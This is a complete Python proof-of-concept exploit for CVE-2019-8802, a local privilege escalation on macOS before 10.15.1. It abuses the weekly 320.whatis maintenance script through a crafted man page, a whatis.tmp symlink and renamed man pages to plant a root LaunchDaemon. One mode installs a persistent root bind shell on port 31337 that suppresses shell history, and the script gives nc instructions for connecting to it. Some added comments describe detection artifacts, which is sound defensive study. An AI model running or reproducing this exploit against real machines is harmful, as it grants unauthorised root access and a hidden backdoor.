"MacOS 320.whatis Script - Privilege Escalation"

"Csaba Fitzl"

macos

2020-05-12

# Exploit Title: MacOS 320.whatis Script - Privilege Escalation
# Date: 2020-05-06
# Exploit Author: Csaba Fitzl
# Vendor Homepage: https://support.apple.com/en-us/HT210722
# Version: macOS < 10.15.1
# Tested on: macOS
# CVE : CVE-2019-8802

import sys
import os

# roff source of the bogus man page that create_man_file() writes.
# Its NAME line carries a complete LaunchDaemon plist (label
# com.sample.Load, ProgramArguments /Applications/Scripts/sample.sh,
# RunAtLoad true) bracketed by "-->" and "<!--".
# NOTE(review): the XML comment markers presumably turn whatever text
# the whatis builder emits around this line into comments, so the file
# reached through the whatis.tmp symlink still parses as a plist --
# confirm against the 320.whatis script itself.
man_file_content = """
.TH exploit 1 "August 16 2019" "Csaba Fitzl"
.SH NAME
exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!--
"""

# Body of /Applications/Scripts/sample.sh in 'quick' mode: the daemon
# just launches the Terminal.app binary.
sh_quick_content = """
/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
"""

# Body of sample.sh in 'reboot' mode: hands off to the bind.py below.
sh_reboot_content = """
python /Applications/Scripts/bind.py
"""

# Python 2 program written to /Applications/Scripts/bind.py in 'reboot'
# mode. It binds TCP port 31337 on all interfaces, accepts a single
# client, dup2()s the connection over fds 0/1/2, sets HISTFILE to
# /dev/null (so the shell writes no history) and spawns /bin/bash in a
# pty. From a detection standpoint, an unexpected listener on 31337
# whose parent chain leads back to launchd is the runtime artifact of
# this mode; the files under /Applications/Scripts are the on-disk ones.
python_bind_content = """
#!/usr/bin/python2
import os
import pty
import socket

lport = 31337

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('', lport))
    s.listen(1)
    (rem, addr) = s.accept()
    os.dup2(rem.fileno(),0)
    os.dup2(rem.fileno(),1)
    os.dup2(rem.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
	
if __name__ == "__main__":
    main()
"""

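def create_man_file():
	"""Write the crafted man page to /usr/local/share/man/man1/<!--exploit.1.

	The body is the module-level ``man_file_content``. The file is written
	inside a ``with`` block so the handle is closed even when write()
	raises (the original open/write/close sequence left it open on that
	path). The man1 directory must already exist; open() raises otherwise.
	"""
	page_path = '/usr/local/share/man/man1/<!--exploit.1'
	print("[i] Creating bogus man page: " + page_path)
	with open(page_path, 'w') as page:
		page.write(man_file_content)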

def create_symlink():
	"""Point /usr/local/share/man/whatis.tmp at the LaunchDaemon plist.

	Shells out to ``ln -s`` through os.system; the exit status is
	discarded, so a failure (for example an already existing whatis.tmp)
	only shows up as ln's own message on stderr and execution continues.
	A symlink at this path that resolves into /Library/LaunchDaemons is
	the on-disk artifact a reviewer would look for.
	"""
	plist_target = '/Library/LaunchDaemons/com.sample.Load.plist'
	link_path = '/usr/local/share/man/whatis.tmp'
	print("[i] Creating symlink in /usr/local/share/man/")
	os.system('ln -s ' + plist_target + ' ' + link_path)

def create_scripts_dir():
	"""Create /Applications/Scripts by shelling out to ``mkdir``.

	The return value of os.system is ignored, so a pre-existing directory
	only produces mkdir's complaint on stderr; callers proceed regardless.
	"""
	scripts_dir = '/Applications/Scripts'
	print("[i] Creating " + scripts_dir + " directory")
	os.system('mkdir ' + scripts_dir)

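def create_quick_scripts():
	"""Set up the 'quick' payload: a sample.sh that launches Terminal.app.

	Creates /Applications/Scripts (via create_scripts_dir), writes
	``sh_quick_content`` to /Applications/Scripts/sample.sh and marks it
	executable with ``chmod +x``. The write happens inside a ``with``
	block so a failing write() no longer leaves the handle open.
	"""
	create_scripts_dir()
	print("[i] Creating script file to be called by LaunchDaemon")
	with open('/Applications/Scripts/sample.sh', 'w') as script:
		script.write(sh_quick_content)
	os.system('chmod +x /Applications/Scripts/sample.sh')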

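def create_reboot_scripts():
	"""Set up the 'reboot' payload: a sample.sh that starts the bind shell.

	Creates /Applications/Scripts (via create_scripts_dir), writes
	``sh_reboot_content`` to sample.sh and marks it executable, then
	writes ``python_bind_content`` to /Applications/Scripts/bind.py.
	Both files are written inside ``with`` blocks so a failing write()
	no longer leaves a handle open (the original only closed on success).
	"""
	create_scripts_dir()
	print("[i] Creating script file to be called by LaunchDaemon")
	with open('/Applications/Scripts/sample.sh', 'w') as script:
		script.write(sh_reboot_content)
	os.system('chmod +x /Applications/Scripts/sample.sh')
	print("[i] Creating python script for bind shell")
	with open('/Applications/Scripts/bind.py', 'w') as bind_script:
		bind_script.write(python_bind_content)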

def rename_man_pages():
	"""Prefix every file under /usr/local/share/man whose name starts with
	a digit with the letter 'a'.

	Walks the whole tree with os.walk, renames each matching file in place
	and logs the *old* path after the rename, exactly as the original did.
	NOTE(review): presumably this moves the numbered pages behind the
	crafted '<!--exploit.1' in the whatis builder's processing order
	('0'-'9' sort before '<' in ASCII) -- confirm against 320.whatis.
	"""
	digit_prefixes = tuple("0123456789")
	for directory, _subdirs, names in os.walk("/usr/local/share/man"):
		for name in names:
			if not name.startswith(digit_prefixes):
				continue
			old_path = os.path.join(directory, name)
			os.rename(old_path, os.path.join(directory, 'a' + name))
			print("[i] Renaming: " + old_path)

def main():
	"""Command-line entry point: ``python makewhatis_exploit.py [quick|reboot]``.

	Both modes write the bogus man page, plant the whatis.tmp symlink and
	rename the digit-prefixed man pages; they differ only in which
	sample.sh payload is written and in the closing instructions printed.
	Exits with status 1 when the argument count is wrong; an unknown mode
	prints the usage text and returns normally. Written for Python 2
	(print statements), like the rest of the file.
	"""
	usage = "[-] Usage: python makewhatis_exploit.py [quick|reboot]"
	if len(sys.argv) != 2:
		print usage
		sys.exit(1)
	modes = {
		'quick': (
			create_quick_scripts,
			"[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist",
		),
		'reboot': (
			create_reboot_scripts,
			"[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337",
		),
	}
	mode = sys.argv[1]
	if mode not in modes:
		print "[-] Invalid arguments"
		print usage
		return
	build_payload, done_message = modes[mode]
	create_man_file()
	create_symlink()
	build_payload()
	rename_man_pages()
	print done_message

if __name__ == "__main__":
	# Only run the installer when invoked as a script, never on import.
	main()